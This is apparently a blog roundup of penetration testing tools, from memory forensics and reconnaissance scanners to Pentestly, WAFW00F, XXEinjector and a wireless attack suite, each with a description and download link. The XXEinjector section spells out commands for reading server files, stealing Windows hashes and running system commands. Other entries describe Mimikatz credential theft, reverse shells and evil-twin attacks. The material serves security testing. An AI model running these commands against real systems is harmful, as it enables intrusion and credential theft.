linux_mem_diff_tool

Script to perform Linux Memory Diff Analysis Using Volatility 

Tool Options : 

The screen shot below shows the usage options

-c  path to the clean memory image
-i  path to the infected memory image
-p profile for the memory images, the profile for the clean and the infected memory image has to be same. The profile can be created by following the procedure mentioned. 

-o path to the file where analysis results will be stored, this is an optional argument. If this option is not given the analysis results are stored in "final_report.txt" in the current working directory. 

-v performs verbose diff analysis. This is again optional. 

By default the script performs non verbose Diff analysis by running most plugins against the clean and infected memory images. In the non verbose mode (default) it skips few plugins which takes some time. with -v option the script runs all the plugins including the slow running plugins because of which it will be slow and can take a while to complete.  

Download tool : https://goo.gl/9zJtj8

URL extractor Tool

Information gathering & website reconnaissance 

Features:

• IP and hosting info like city and country (using FreegeoIP)
• DNS servers (using dig)
• ASN, Network range, ISP name (using RISwhois)
• Load balancer test
• Whois for abuse mail (using Spamcop)
• PAC (Proxy Auto Configuration) file
• Compares hashes to diff code
• robots.txt (recursively looking for hidden stuff)
• Source code (looking for passwords and users)
• External links (frames from other websites)
• Directory FUZZ (like Dirbuster and Wfuzz - using Dirbuster) directory list)
• URLvoid API - checks Google page rank, Alexa rank and possible blacklists
• Provides useful links at other websites to correlate with IP/ASN
• Option to open ALL results in browser at the end

Requirements: Tested on Kali light mini AND OSX 10.11.3 with brew

sudo apt-get install bc curl dnsutils libxml2-utils whois md5sha1sum -y  

Todo list:

 Upload to github :)
 Integration with other APIs
 Add host regex validation
 Use GNU parallel to fuzz URLs
 Export to CSV
 Possible migration to python
 Integration with JoomScan/WPScan/CMSmap
 Integration with CipherScan
 Check for installed packages 





How to install : 

























Download tool : https://goo.gl/kBXv1D

Pr0beScan Tool

probescan is a python prepared by the automated probe target URL access to information tools.

How to install 

function

• Domain Whois probe target mailbox and the mailbox registered domain names.
• Detection of target host open port and CDN situation.
• Probe targets all domain names with IP and secondary domain name servers.
• Detecting whether the target domain has domain transmission loopholes.
• Detection Web server and scripting.
• Probe C segment Web server.
• Add wait  

Download tool : https://goo.gl/T6XELi

Python and Powershell internal penetration testing framework

Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python.   

How to use :  

Current features

• Import NMAP XML
• Test SMB authentication using:
  • individual credentials
  • file containing credentials
  • null credentials
  • NTLM hash
• Test local administrator privileges for successful SMB authentication
• Identify readable SMB shares for valid credentials
• Store Domain/Enterprise Admin account names
• Determine location of running Domain Admin processes
• Determine systems of logged in Domain Admins
• Execute Powershell commands in memory and exfil results
• Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1)
• Receive a command shell (Powercat)
• Receive a meterpreter session (Invoke-Shellcode.ps1) 

Download tool : https://goo.gl/8UeqtD

php tool for network scanning

Hostscan is a php tool which allows you to scan specific range of hosts, mostly for information gathering and testing for weak passwords. I guess it's a pentest tool, i'd created it to automate some tests that i often do. Since it's PHP, it works quite slowly compared to client-side soft. 


How to install : 

step1 :

           

step 2 : Start the apache server   

step 3 : Copy the hostscan.php file and past in /var/www path  

step 4 : The type url : localhost/hostscan.php  

          

              

step 5 : After the scanning completed see the results in general info and ip address 

         

            

step 6 : it use Brute force attack automatically       

          

Download tool : https://github.com/Smaash/hostscan

   

Joomla_Components_Scanner

A free and open source software to find the components installed in Joomla CMS, built out of the ashes of Joomscan.            

     Features

• Scanning the Joomla CMS sites in search of components/extensions (database of more than 500 components);
• Locate the browsable folders of component (Index of ...);
• Locate the components disabled or protected
• Locate the robots.txt file or error_log file
• Supports HTTP or HTTPS connections                                                                                                                                                                                                                             

How to use   

Download tool : https://goo.gl/nKTAI0

javascript static security analysis tool

Introduction

Today, more and more developers are switching to JavaScript as their first choice of language. The reason is simple JavaScript has now been started to be accepted as the mainstream programming for applications, be it on the web or on the mobile; be it on client-side, be it on the server side. JavaScript flexibility and its loose typing is friendly to developers to create rich applications at an unbelievable speed. Major advancements in the performance of JavaScript interpreters, in recent days, have almost eliminated the question of scalability and throughput from many organizations. So the point is JavaScript is now a really important and powerful language we have today and it's usage growing everyday. From client-side code in web applications it grew to server-side through Node.JS and it's now supported as proper language to write applications on major mobile operating system platforms like Windows 8 apps and the upcoming Firefox OS apps.

But the problem is, many developers practice insecure coding which leads to many client side attacks, out of which DOM XSS is the most infamous. We tried to understand the root cause of this problem and figured out is that there are not enough practically usable tools that can solve real-world problems. Hence as our first attempt towards solving this problem, we want to talk about JSPrime: A JavaScript static analysis tool for the rest of us. It's a very light-weight and very easy to use point-and-click tool! The static analysis tool is based on the very popular Esprima ECMAScript parser by Aria Hidayat.

I would like to highlight some of the interesting features of the tool below:

• JS Library Aware Source & Sinks
• Most dynamic or static analyzers are developed to support native/pure JavaScript which actually is a problem for most developers since the introductions and wide-adoption for JavaScript frameworks/libraries like jQuery, YUI etc. Since these scanners are designed to support pure JavaScript, they fail at understanding the context of the development due to the usage of libraries and produce many false-positives and false-negatives. To solve this we have identified the dangerous user input sources and code execution sink functions for jQuery and YUI, for the initial release and we shall talk about how users can easily extend it for other frameworks.
• Variable & Function Tracing (This feature is a part of our code flow analysis algorithm)
• Variable & Function Scope Aware analysis (This feature is a part of our code flow analysis algorithm)
• Known filter function aware
• OOP & Protoype Compliant
• Minimum False Positive alerts
• Supports minified JavaScript
• Blazing fast performance
• Point and Click :-) (my personal favorite)

Upcoming features:

• Automatic code de-obfuscation & decompression through Hybrid Analysis (Ra.2 improvisation;http://code.google.com/p/ra2-dom-xss-scanner)
• ECMAScript family support (ActionScript 3, Node.JS, WinJS)  

Web Client : 

Open "index.html" in your browser.

Server-Side (Node.JS)

1. In the terminal type "node server.js"
2. Go to 127.0.0.1:8888 in your browser.  

Download link : https://goo.gl/3HF2Qz

Fingerprint Web Application Firewall (WAF) Tool

WAFW00F

WAFW00F identifies and fingerprints Web Application Firewall (WAF) products.

How does it work?

To do its magic, WAFW00F does the following:

• Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions
• If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is
• If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks

What does it detect?

It detects a number of WAFs. To view which WAFs it is able to detect run WAFW00F with the -l option. At the time of writing the output is as follows:

$ ./wafw00f -l

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Can test for these WAFs:

Applicure dotDefender
Art of Defence HyperGuard
Aqtronix WebKnight
Barracuda Aplication Firewall
BinarySec
Cisco ACE XML Gateway
Citrix NetScaler
CloudFlare
DenyALL WAF
eEye Digital Security - SecureIIS
F5 FirePass
F5 TrafficShield
F5 BIG-IP (LTM, APM, ASM)
IBM Web Application Security
IBM DataPower
Imperva SecureSphere
InfoGuard Airlock
Incapsula WAF
Juniper WebApp Secure
Microsoft ISA Server
Microsoft UrlScan
NetContinuum
Profense
TrustWave ModSecurity
Teros WAF
USP Secure Entry Server 

How do I install it?







Download tool : https://goo.gl/zGQgTB




XXEinjector

XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.  

Options:

  --host        Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
  --file        Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
  --path        Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
  --brute       Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)
  --logger      Log results only. Do not send requests. HTTP logger looks for "p" parameter with results.

  --rhost       Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3)
  --rport       Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)

  --oob         Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)
  --direct      Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK)
  --2ndfile     File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
  --phpfilter   Use PHP filter to base64 encode target file before sending.
  --netdoc      Use netdoc protocol instead of file (Java).
  --enumports   Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445)

  --hashes      Steals Windows hash of the user that runs an application.
  --expect      Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)
  --upload      Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)
  --xslt        Tests for XSLT injection.

  --ssl         Use SSL.
  --proxy       Proxy to use. (--proxy=127.0.0.1:8080)
  --httpport    Set custom HTTP port. (--httpport=80)
  --ftpport     Set custom FTP port. (--ftpport=21)
  --gopherport  Set custom gopher port. (--gopherport=70)
  --jarport     Set custom port for uploading files using jar. (--jarport=1337)
  --xsltport    Set custom port for XSLT injection test. (--xsltport=1337)

  --test        This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server.
  --urlencode   URL encode injected DTD. This is default for URI.
  --nodtd       If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like.
  --output      Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)
  --timeout     Timeout for receiving file/directory content. (--timeout=20)
  --contimeout  Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)
  --fast        Skip asking what to enumerate. Prone to false-positives.
  --verbose     Show verbose messages.

Example usage:

  Enumerating /etc directory in HTTPS application:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
  Enumerating /etc directory using gopher for OOB method:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
  Second order exploitation:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
  Bruteforcing files using HTTP out of band method and netdoc protocol:
  ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
  Enumerating using direct exploitation:
  ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
  Enumerating unfiltered ports:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
  Stealing Windows hashes:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
  Uploading files using Java jar:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
  Executing system commands using PHP expect:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
  Testing for XSLT injection:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
  Log requests only:
  ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt 

Download tool : https://goo.gl/lXJXkj

Automated Wireless Hacking Tool

This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage: python InfernalWireless.py (from the same folder where your code exists) 

Note: Please make sure to run the 'configure under File menu to install required software'

Recent Bug Fixes:

• Display Scanned network with BSSID and Channel
• WPA2 hacking is now captured by automatically setting an appropriate Channel
• Aireplay issue is resolved during deauthentication stage due to channel settings in airodump
• SSID selecting during WPA2 hacking is resolved (extra symbol was being added)
• One import was removed by mistake but now it is resolved.
• Frame size is enlarged slightly, as it was hiding a button
• User interaction during Fake Access Points creation. This will let the user to choose the outbout interface for the internet, Evil Twin, Infernal Wireless and Free Internet
• NAT rules for Fake APs are improved
• Catch and Error implemented for Infernal Wireless Attack
• Evil Twin Attack is improved. Now lets the user to choose outbound interface

New Addition:

• Extra Menu is added to kill airodump-ng from GUI, previously it was shutting down the whole tool.
• Added a feature to let the user decide how many packets to send for deauthentication during WPA2 Hacking
• Added a logo
• During MiTM via Fake AP, you can see the victim's browser live on the GUI panel
• During MiTM, now you can see the HTTP request and responses live on the GUI panel

FAQ:

I have a problem with connecting to the Database

Solution:

(Thanks to @lightos for this fix)

There seem to be few issues with Database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow the following steps.

1. Delete dbconnect.conf file from the Infernalwireless folder
2. Run the following command from your mysql console.
   mysql>use mysql;
   mysql>CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
   mysql>GRANT ALL PRIVILEGES ON \*.\* TO 'root2'@'localhost' WITH GRANT OPTION;
3. Try to run the tool again.

Release Notes:

New Features:

• GUI Wireless security assessment SUIT
• Impelemented
• WPA2 hacking
• WEP Hacking
• WPA2 Enterprise hacking
• Wireless Social Engineering
• SSL Strip
• Report generation
• PDF Report
• HTML Report
• Note taking function
• Data is saved into Database
• Network mapping
• MiTM
• Probe Request

Changes:

• Improved compatibility
• Report improvement
• Better NAT Rules

Download tool : https://goo.gl/SvUNxp